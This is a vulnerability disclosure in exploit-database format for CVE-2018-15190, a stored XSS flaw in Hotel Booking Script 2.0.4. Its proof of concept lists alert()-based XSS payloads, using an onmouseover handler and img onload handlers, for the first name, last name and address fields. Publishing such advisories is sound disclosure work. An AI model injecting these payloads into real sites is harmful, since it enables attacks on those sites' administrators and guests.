CVE-2018-15190 : Hotel Booking Script – 2.0.4 – has Stored XSS Vulnerability

******************************
# Exploit Title: Hotel Booking Script – 2.0.4 – has Stored XSS Via First name , Last name and Address
# Date: 07.08.2018
# Site Titel : Hotel Booking
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software link : https://www.phpscriptsmall.com/product/hotel-booking-script/
# Category: Web Application
# Version: 2.0.4
# Exploit Author: Vikas Chaudhary
# Web: https://gkaim.com/
# Contact: https://gkaim.com/contact-us/
# Published on : https://gkaim.com/cve-2018-15190-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-15190

*****************************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative.
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record
in completion and implementation of numerous projects in various verticals and domains..
It has 300 plus PHP scripts ready to buy.

# DESCRIPTION :- Stored XSS Vulnerability are found in Specified Vendor .
By storing a payload there, an administrative or guest user can be attacked by an attacker
without tricking them to visit a malicious web site or clicking on ann malicious link.

**********************
Proof of Concept:-
———————–
1. Go to Site
2- Select => SIGN UP/IN => REGISTER=> and then fill the Form Click on REGISTER.
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Select Profile=> Edit Profile and paste these Code in given parameter.
In First Name=> ‘”<Html /Onmouseover=(alert)(/VIKAS/) //
In Last Name => <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(/CHAUDHARY/)>
In Address => <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(/MYAIM/)>
and click on SUBMIT

6- You will having popup of /VIKAS/ , /CHAUDHARY/ and /MYAIM/ in you account… [ /VIKAS/ will popup until you manually not stop ]

Comment Please